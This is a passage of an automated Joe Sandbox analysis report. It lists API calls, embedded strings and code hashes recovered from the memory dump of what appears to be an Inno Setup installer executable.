                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ObjectStock$CapsDeviceIconLoadRelease
                                                              • String ID:
                                                              • API String ID: 225703358-0
                                                              • Opcode ID: 93123cf7b7da28845296a778695a34f9ae7968dfa7e72d2685fd09fde09bf652
                                                              • Instruction ID: 282f56568f1177e4dad385ec7f61a974d29090d827cf1f87eb40c920fa9ca7e8
                                                              • Opcode Fuzzy Hash: 93123cf7b7da28845296a778695a34f9ae7968dfa7e72d2685fd09fde09bf652
                                                              • Instruction Fuzzy Hash: 4C1142706457015EE340BFA66E52B6A36A4D725708F40413FF609AF3D1D77A2C448B9E
                                                              APIs
                                                              • LoadCursorA.USER32(00000000,00007F02), ref: 00463344
                                                              • SetCursor.USER32(00000000,00000000,00007F02,00000000,004633D9), ref: 0046334A
                                                              • SetCursor.USER32(?,004633C1,00007F02,00000000,004633D9), ref: 004633B4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Cursor$Load
                                                              • String ID: $ $Internal error: Item already expanding
                                                              • API String ID: 1675784387-1948079669
                                                              • Opcode ID: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
                                                              • Instruction ID: e4e85f4aa3fa623d7d3a169fbc538aa22306e9421cedfdc69a3031d12d347dae
                                                              • Opcode Fuzzy Hash: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
                                                              • Instruction Fuzzy Hash: 4CB18270604284EFDB11DF29C545B9ABBF1BF04305F1484AAE8469B792DB78EE44CB4A
                                                              APIs
                                                              • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileStringWrite
                                                              • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                              • API String ID: 390214022-3304407042
                                                              • Opcode ID: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
                                                              • Instruction ID: 4c4b1d7f09994941c57eaafc4db68242d6a3f6c21ecd3f2b5b8f846a746055a2
                                                              • Opcode Fuzzy Hash: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
                                                              • Instruction Fuzzy Hash: 40911434E002099BDB01EFA5D842BDEB7F5AF4874AF608466E90077392D7786E49CB58
                                                              APIs
                                                              • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00476CA9
                                                              • SetWindowLongW.USER32(00000000,000000FC,00476C04), ref: 00476CD0
                                                              • GetACP.KERNEL32(00000000,00476EE8,?,00000000,00476F12), ref: 00476D0D
                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00476D53
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ClassInfoLongMessageSendWindow
                                                              • String ID: COMBOBOX$Inno Setup: Language
                                                              • API String ID: 3391662889-4234151509
                                                              • Opcode ID: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
                                                              • Instruction ID: b13fa11fcbd9abdf7db93726dac51e4442bd67f198c8610d2c1064f44be53319
                                                              • Opcode Fuzzy Hash: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
                                                              • Instruction Fuzzy Hash: 46812C346006059FDB10DF69D985AEAB7F2FB09304F15C1BAE808EB762D778AD41CB58
                                                              APIs
                                                              • GetSystemDefaultLCID.KERNEL32(00000000,00408968,?,?,?,?,00000000,00000000,00000000,?,0040996F,00000000,00409982), ref: 0040873A
                                                                • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                • Part of subcall function 004085B4: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087B6,?,?,?,00000000,00408968), ref: 004085C7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: InfoLocale$DefaultSystem
                                                              • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                              • API String ID: 1044490935-665933166
                                                              • Opcode ID: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
                                                              • Instruction ID: 5c6fde8006682913ecab3173e7335377554a92ac61a87523d81808753b4ec1a9
                                                              • Opcode Fuzzy Hash: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
                                                              • Instruction Fuzzy Hash: 7D516C24B00108ABDB01FBA69E4169EB7A9DB94308F50C07FA181BB3C3CE3DDA05975D
                                                              APIs
                                                              • GetVersion.KERNEL32(00000000,004118F9), ref: 0041178C
                                                              • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041184A
                                                                • Part of subcall function 00411AAC: CreatePopupMenu.USER32 ref: 00411AC6
                                                              • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118D6
                                                                • Part of subcall function 00411AAC: CreateMenu.USER32 ref: 00411AD0
                                                              • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118BD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Menu$Insert$Create$ItemPopupVersion
                                                              • String ID: ,$?
                                                              • API String ID: 2359071979-2308483597
                                                              • Opcode ID: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
                                                              • Instruction ID: ecf66c9774bccec907b621c371347452b74b7622051e058d8a4a73451c3e974f
                                                              • Opcode Fuzzy Hash: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
                                                              • Instruction Fuzzy Hash: D7510674A00245ABDB10EF6ADC816EA7BF9AF09304B11857BF904E73A6D738DD41CB58
                                                              APIs
                                                              • GetObjectA.GDI32(?,00000018,?), ref: 0041BF28
                                                              • GetObjectA.GDI32(?,00000018,?), ref: 0041BF37
                                                              • GetBitmapBits.GDI32(?,?,?), ref: 0041BF88
                                                              • GetBitmapBits.GDI32(?,?,?), ref: 0041BF96
                                                              • DeleteObject.GDI32(?), ref: 0041BF9F
                                                              • DeleteObject.GDI32(?), ref: 0041BFA8
                                                              • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFC5
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Object$BitmapBitsDelete$CreateIcon
                                                              • String ID:
                                                              • API String ID: 1030595962-0
                                                              • Opcode ID: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
                                                              • Instruction ID: 74cae3b7aa7aab4ce12a2fbd062d204c5c4082198076ec6df892ad84fd278e80
                                                              • Opcode Fuzzy Hash: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
                                                              • Instruction Fuzzy Hash: 6A510671A002199FCB10DFA9C9819EEB7F9EF48314B11416AF914E7395D738AD41CB68
                                                              APIs
                                                              • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CEFE
                                                              • GetDeviceCaps.GDI32(00000000,00000026), ref: 0041CF1D
                                                              • SelectPalette.GDI32(?,?,00000001), ref: 0041CF83
                                                              • RealizePalette.GDI32(?), ref: 0041CF92
                                                              • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CFFC
                                                              • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D03A
                                                              • SelectPalette.GDI32(?,?,00000001), ref: 0041D05F
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: PaletteStretch$Select$BitsCapsDeviceModeRealize
                                                              • String ID:
                                                              • API String ID: 2222416421-0
                                                              • Opcode ID: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
                                                              • Instruction ID: 4b814cf558339e083a7fb5ccd56fb4ffad9fd0a27a4bfdacf16c2dd2476febac
                                                              • Opcode Fuzzy Hash: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
                                                              • Instruction Fuzzy Hash: D2515EB0604200AFDB14DFA8C985F9BBBE9EF08304F10459AB549DB292C778ED81CB58
                                                              APIs
                                                              • SendMessageA.USER32(00000000,?,?), ref: 0045732E
                                                                • Part of subcall function 0042427C: GetWindowTextA.USER32(?,?,00000100), ref: 0042429C
                                                                • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00457395
                                                              • TranslateMessage.USER32(?), ref: 004573B3
                                                              • DispatchMessageA.USER32(?), ref: 004573BC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Message$TextThreadWindow$CurrentDispatchEnumSendTranslateWindows
                                                              • String ID: [Paused]
                                                              • API String ID: 1007367021-4230553315
                                                              • Opcode ID: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
                                                              • Instruction ID: a72840e20965590be0df7748d4dcd1bfe023db3bc5775872eefead19b10ec59e
                                                              • Opcode Fuzzy Hash: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
                                                              • Instruction Fuzzy Hash: 633175319082449ADB11DBB9EC81B9E7FB8EF49314F5540B7EC00E7292D73C9909DB69
                                                              APIs
                                                              • GetCursor.USER32(00000000,0046B55F), ref: 0046B4DC
                                                              • LoadCursorA.USER32(00000000,00007F02), ref: 0046B4EA
                                                              • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4F0
                                                              • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4FA
                                                              • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B500
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Cursor$LoadSleep
                                                              • String ID: CheckPassword
                                                              • API String ID: 4023313301-1302249611
                                                              • Opcode ID: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
                                                              • Instruction ID: 9465d4cba05e43c3341d6d018928b45656d3fee3f016636846a90655da25d4f4
                                                              • Opcode Fuzzy Hash: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
                                                              • Instruction Fuzzy Hash: D0316334740204AFD711EF69C899B9A7BE4EF45308F5580B6F9049B3A2D7789E40CB99
                                                              APIs
                                                                • Part of subcall function 00477B94: GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
                                                                • Part of subcall function 00477B94: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
                                                                • Part of subcall function 00477B94: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
                                                              • SendMessageA.USER32(00000000,0000004A,00000000,00478026), ref: 00477CA1
                                                              • GetTickCount.KERNEL32 ref: 00477CE6
                                                              • GetTickCount.KERNEL32 ref: 00477CF0
                                                              • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00477D45
                                                              Strings
                                                              • CallSpawnServer: Unexpected response: $%x, xrefs: 00477CD6
                                                              • CallSpawnServer: Unexpected status: %d, xrefs: 00477D2E
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                              • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                              • API String ID: 613034392-3771334282
                                                              • Opcode ID: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
                                                              • Instruction ID: 262cbc5b9954910938d5a1e8e32dc50db46ad6f301169d9d39307b56b522dac3
                                                              • Opcode Fuzzy Hash: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
                                                              • Instruction Fuzzy Hash: 87318474B042159EDB10EBB9C8867EE76A0AF08714F90807AB548EB392D67C9D4187AD
                                                              APIs
                                                              • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 0045983F
                                                              Strings
                                                              • CreateAssemblyCache, xrefs: 00459836
                                                              • Failed to load .NET Framework DLL "%s", xrefs: 00459824
                                                              • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 0045984A
                                                              • Fusion.dll, xrefs: 004597DF
                                                              • .NET Framework CreateAssemblyCache function failed, xrefs: 00459862
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                              • API String ID: 190572456-3990135632
                                                              • Opcode ID: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
                                                              • Instruction ID: 9a538673283cb431493768ab67eac729fe35d93f11f945e2dcd414e2b3f175b6
                                                              • Opcode Fuzzy Hash: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
                                                              • Instruction Fuzzy Hash: A2318B70E10649ABCB10FFA5C88169EB7B8EF45315F50857BE814E7382DB389E08C799
                                                              APIs
                                                                • Part of subcall function 0041C048: GetObjectA.GDI32(?,00000018), ref: 0041C055
                                                              • GetFocus.USER32 ref: 0041C168
                                                              • GetDC.USER32(?), ref: 0041C174
                                                              • SelectPalette.GDI32(?,?,00000000), ref: 0041C195
                                                              • RealizePalette.GDI32(?), ref: 0041C1A1
                                                              • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1B8
                                                              • SelectPalette.GDI32(?,00000000,00000000), ref: 0041C1E0
                                                              • ReleaseDC.USER32(?,?), ref: 0041C1ED
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Palette$Select$BitsFocusObjectRealizeRelease
                                                              • String ID:
                                                              • API String ID: 3303097818-0
                                                              • Opcode ID: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                              • Instruction ID: 25a0b6576c779426e59073023ceed4ef49f3845c1b310514cd4f08ef327de147
                                                              • Opcode Fuzzy Hash: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                              • Instruction Fuzzy Hash: 49116D71A44604BFDF10DBE9CC81FAFB7FCEB48700F50486AB518E7281DA7899008B28
                                                              APIs
                                                              • GetSystemMetrics.USER32(0000000E), ref: 00418C70
                                                              • GetSystemMetrics.USER32(0000000D), ref: 00418C78
                                                              • 6F542980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C7E
                                                                • Part of subcall function 004107F8: 6F53C400.COMCTL32(0049B628,000000FF,00000000,00418CAC,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004107FC
                                                              • 6F5ACB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CCE
                                                              • 6F5AC740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CD9
                                                              • 6F5ACB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000), ref: 00418CEC
                                                              • 6F540860.COMCTL32(0049B628,00418D0F,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E), ref: 00418D02
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: MetricsSystem$C400C740F540860F542980
                                                              • String ID:
                                                              • API String ID: 3392676452-0
                                                              • Opcode ID: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                              • Instruction ID: f48c8f8e6a400555c090207229051c9eae11b8a9b20c4da93df477ea8fa1a9e8
                                                              • Opcode Fuzzy Hash: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                              • Instruction Fuzzy Hash: 6B112475744204BBDB50EBA9EC82FAD73F8DB08704F504066B514EB2C1DAB9AD808759
                                                              APIs
                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00483D24), ref: 00483D09
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseOpen
                                                              • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                              • API String ID: 47109696-2530820420
                                                              • Opcode ID: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
                                                              • Instruction ID: 212569cff1cfb7858b589fbdbabdc9c693f1f7cc945fcf11155ec0ddb5f1f406
                                                              • Opcode Fuzzy Hash: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
                                                              • Instruction Fuzzy Hash: CC117C30704244AADB10FF65D862B5E7BF9DB45B05F618877A800E7282EB78AE05875C
                                                              APIs
                                                              • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                              • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                              • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                              • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                              • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                              • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                              • DeleteDC.GDI32(?), ref: 0041B4D9
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
